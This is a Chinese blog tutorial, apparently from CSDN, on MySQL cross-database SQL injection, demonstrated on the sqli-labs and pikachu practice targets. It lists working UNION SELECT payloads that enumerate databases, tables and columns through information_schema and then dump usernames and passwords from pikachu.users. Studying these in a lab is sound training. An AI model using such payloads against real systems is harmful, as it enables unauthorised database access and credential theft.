MySQL跨库注入

最新推荐文章于 2023-04-13 02:23:45 发布
最新推荐文章于 2023-04-13 02:23:45 发布
阅读量363 收藏 2
点赞数
分类专栏: SQL注入 网络安全 渗透测试 文章标签: mysql 数据库 sql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/123219170
版权
渗透测试 同时被 3 个专栏收录
55 篇文章 11 订阅
订阅专栏
网络安全
46 篇文章 23 订阅
订阅专栏
SQL注入
22 篇文章 1 订阅
订阅专栏

文章目录

MySQL跨库注入

需要高权限用户

判断权限:连接数据库的用户名

演示靶场——sqlilabs-less2

image-20220214184925036

判断注入点,爆字段略

1、查出该root账号下所有数据库

union select 1,group_concat(schema_name),3 from information_schema.schemata

image-20220214185551910

2、获取指定数据库下表名的信息,以pikachu为例

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'pikachu'

image-20220214185701782

3、获取指定数据库下指定表名下的列名信息

union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'

image-20220214185741465

4、获取指定数据

union select 1,username,password from pikachu.users

image-20220214185818842

由于是跨库注入,所以表名是pikachu.users

Shadow丶S
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Mycat-server-1.6-RELEASE源码
10-16
Mycat关键特性 关键特性 支持SQL92标准 支持MySQL、Oracle、DB2、SQL Server、PostgreSQL等DB的常见SQL语法 遵守Mysql原生协议,语言,平台,数据库的通用中间件代理。 基于心跳的自动故障切换,支持读写分离,支持MySQL主从,以及galera cluster集群。 支持Galera for MySQL集群,Percona Cluster或者MariaDB cluster 基于Nio实现,有效管理线程,解决高并发问题。 支持数据的多片自动路由与聚合,支持sum,count,max等常用的聚合函数,支持跨库分页。 支持单库内部任意join,支持跨库2表join,甚至基于caltlet的多表join。 支持通过全局表,ER关系的分片策略,实现了高效的多表join查询。 支持多租户方案。 支持分布式事务(弱xa)。 支持XA分布式事务(1.6.5)。 支持全局序列号,解决分布式下的主键生成问题。 分片规则丰富,插件化开发,易于扩展。 强大的web,命令行监控。 支持前端作为MySQL通用代理,后端JDBC方式支持Oracle、DB2、SQL Server 、 mongodb 、巨杉。 支持密码加密 支持服务降级 支持IP白名单 支持SQL黑名单、sql注入攻击拦截 支持prepare预编译指令(1.6) 支持非堆内存(Direct Memory)聚合计算(1.6) 支持PostgreSQL的native协议(1.6) 支持mysql和oracle存储过程,out参数、多结果集返回(1.6) 支持zookeeper协调主从切换、zk序列、配置zk化(1.6) 支持库内分表(1.6) 集群基于ZooKeeper管理,在线升级,扩容,智能优化,大数据处理(2.0开发版)。
mysql同时读取写入,从数据库读取,同时写入另一个数据库
weixin_42157188的博客
02-05 1113
I am working on a simple script to read from one database (oracle) andwrite to another (postgresql). I retrieve the data from oracle inchunks and drop the data to postgresql continuously. The author...
Web安全--SQL注入--MYSQL跨库--ACCESS偏移
weixin_68243135的博客
11-16 485
SQL注入
大数据系列之PySpark读写外部数据库MySQL
牧羊人的方向
04-26 1916
本文主要介绍Spark通过PyMySQL和API算子对外部数据库MySQL和HBASE的读写操作
python操作mysql数据库读取一个数据库的表写入另一个数据库
weixin_30799995的博客
02-28 947
写这个肯定是工作需要了,不啰嗦,直接说事 我现在有两台主机,一台是公司主机,一台是客户主机,要求把公司主机上的三个表同步到客户主机上的数据库 注意是同步,首先就得考虑用linux定时任务或者主从复制,主从复制因为我没有权限在主机上设置,所以只能选择通过脚本,做定时任务 涉及的三个表创建语句 # 创建表`schedule_building` create_sql_schedule_buil...
SQL注入跨库注入
剁椒鱼头没剁椒的博客
02-27 1043
该部分补充之前发布的SQL注入基础原理与案例中未提到的跨库注入。后续也会在之前发布过的文章中再逐渐补充未提到内容。参考文章跨库注入首先需要明确注入点的权限,若不是root权限或者管理员权限,那么无法执行跨库注入,只有高权限才能执行跨库注入。简单来说,跨库注入就是在同一个数据库管理系统中,在某一个点存在SQL注入,而通过这点查询到,该权限为Root权限,那么就可以使用这种方式去操作同数据库下的其它网站数据库,这样就实现的跨库注入
SQL高权限注入(附实例)-跨库注入-文件读写操作-魔术引号-防注入方法
ran的博客
01-13 506
此次要进行跨库注入的目标是“Pikachu漏洞联系平台”,而上一步获取到的所有数据库里可以发现有一个数据库名称为“pikachu”,不难判断出此数据库即为跨库注入的目标的数据库。比如下面的数据库A是“root用户”,就可以对相关的网站B、网站C进行跨库注入,但是想要实现跨库注入,首先就需要知道数据库B、数据库C的数据库名称。进行上述操作时,文件路径里的斜杠最好使用“/”或者“\\”,而不是使用默认的“\”,因为在很多编程语言中“\n”代表换行的意思,可能因此会发生错误。
class2 跨库注入
qq_46185846的博客
02-18 203
跨库注入,新增知识点information_schema.schemata,存储所有的数据库信息 如果要应用跨库注入,有一个条件,那就是当前数据库用户必须为root用户,才可以对整个数据库进行操作 确定用户: user()确定用户 如果回显为root@localhost或者[email protected]只要@号前面为root,则代表该数据库用户为root 跨库注入过程: 第一步: 获取当前所有的数据...
小迪笔记____
kkkkkllllllll的博客
07-01 3098
小迪笔记
高权限注入&跨库注入
hibugs
04-13 363
上篇文章中我们讲述了如何进行手工注入,也通过墨者学院的靶场,真实的感受了SQL注入的感觉。这篇文章我们将继续介绍SQL注入
asp.net知识库
06-18
获取數据库表的前N条记录 几段SQL Server语句和存储过程 生成表中的数据的脚本 最详细的SQL注入相关的命令整理 Oracle Oracle中PL/SQL单行函数和组函数详解 mssql+oracle Oracle编程的编码规范及命名规则 Oracle...
Xpath:一个基于python的平台工具,可自动检测和利用基于错误的注入安全漏洞的过程
05-06
Xpath 一个基于python的平台工具,可自动检测和利用基于错误的注入安全漏洞的过程。要求的Python 3 Python pip3 Python模块requests Python模块colorama Python模块chardet模块安装pip install -r requirements....
Thinkphp5第六讲:数据库操作之查询构造器
12-14
查询构造器,基于PDO实现的,可以更方便执行数据库的操作,对不同的数据库驱动都是统一的语法,同时免于SQL注入,安全性较高。解释:我们开发不同项目时,因项目需求会选择不同的数据库,常用数据库mysql、oracle...
Mycat数据库中间件-其他
06-12
支持单库内部任意join,支持跨库2表join,甚至基于caltlet的多表join。 支持通过全局表,ER关系的分片策略,实现了高效的多表join查询。 支持多租户方案。 支持分布式事务(弱xa)。 支持全局序列号,解决分布式下的...
【计算机网络】IP地址详解
热门推荐
一个普普通通的博客
02-24 4万+
文章目录· IP地址详解一.简单局域网二.IP地址三.子网掩码局域网通信规则:IP地址构成:子网掩码:子网掩码如何确认网络位:四.IP地址详解IP地址详细解剖:案例1:案例2:补充:127开头五.网关六.DNS**DNS:Domain Name Service域名服务器**使用cmd命令---nslookup + 网址 可查询该网址的IP地址示例可使用该IP地址访问百度七.配置IP(以Windows xp为例,其他所有系统同样)1)右键网上邻居---属性--右键本地连接---属性2)双击Internet协
ACL原理及配置
一个普普通通的博客
01-24 2万+
ACL原理及配置 ACL概述 ACL组成 规则编号(Rule ID) 通配符(Wildcard) ACL的分类与标识 基本ACL&高级ACL ACL的匹配机制 ACL的匹配顺序及匹配结果 ACL的匹配位置 ACL的基础配置命令
域——windows服务器域详解
一个普普通通的博客
07-16 1万+
文章目录·域**1.Domain**2.内网环境:3.域的特点:4.域的组成:5.域的部署:6.活动目录7.组策略GPO(Group Policy)8.部署安装活动目录:9.PC加入域:10.常见小问题11)OU:组织单位(Organizational Unit)OU管理12)组策略:Group Policy = GPO1、新建组策略2、编辑组策略 ·域 1.Domain 2.内网环境: 1)工作组:默认模式,人人平等,不方便管理 2)域:人人不平等,集中管理,同一管理 3.域的特点: 集中/统一管理 4.
文件上传之IIS6.0解析漏洞
一个普普通通的博客
03-15 4006
iis6.0解析漏洞
Windows应急响应简述
一个普普通通的博客
04-18 3609
windows应急响应简述
spring boot mybits 跨库查询
最新发布
09-04
Spring Boot结合MyBatis进行跨库查询可以通过多数据源配置实现。 首先,在application.properties(或application.yaml)文件中配置多个数据源的信息。例如,配置两个数据源dataSource1和dataSource2,分别对应两个数据库: ``` spring.datasource.dataSource1.url=jdbc:mysql://localhost:3306/db1 spring.datasource.dataSource1.username=root spring.datasource.dataSource1.password=123456 spring.datasource.dataSource2.url=jdbc:mysql://localhost:3306/db2 spring.datasource.dataSource2.username=root spring.datasource.dataSource2.password=123456 ``` 然后,在数据源配置类中创建两个数据源,并将其注入SqlSessionFactory中: ```java @Configuration @MapperScan(basePackages = "com.example.demo.mapper1", sqlSessionFactoryRef = "sqlSessionFactory1") public class DataSource1Config { @Bean @ConfigurationProperties(prefix = "spring.datasource.dataSource1") public DataSource dataSource1() { return DataSourceBuilder.create().build(); } @Bean public SqlSessionFactory sqlSessionFactory1() throws Exception { SqlSessionFactoryBean factoryBean = new SqlSessionFactoryBean(); factoryBean.setDataSource(dataSource1()); return factoryBean.getObject(); } } @Configuration @MapperScan(basePackages = "com.example.demo.mapper2", sqlSessionFactoryRef = "sqlSessionFactory2") public class DataSource2Config { @Bean @ConfigurationProperties(prefix = "spring.datasource.dataSource2") public DataSource dataSource2() { return DataSourceBuilder.create().build(); } @Bean public SqlSessionFactory sqlSessionFactory2() throws Exception { SqlSessionFactoryBean factoryBean = new SqlSessionFactoryBean(); factoryBean.setDataSource(dataSource2()); return factoryBean.getObject(); } } ``` 接下来,在MyBatis的Mapper接口中使用@Qualifier指定需要使用的SqlSessionFactory: ```java @Mapper @Qualifier("sqlSessionFactory1") public interface Mapper1 { // 定义数据库1的查询方法 } @Mapper @Qualifier("sqlSessionFactory2") public interface Mapper2 { // 定义数据库2的查询方法 } ``` 最后,在业务类中注入两个Mapper对象,即可实现跨库查询: ```java @Service public class UserService { @Autowired private Mapper1 mapper1; @Autowired private Mapper2 mapper2; public void crossDbQuery() { // 使用mapper1和mapper2进行跨库查询操作 // ... } } ``` 通过以上配置,我们可以实现在Spring Boot中使用MyBatis进行跨库查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值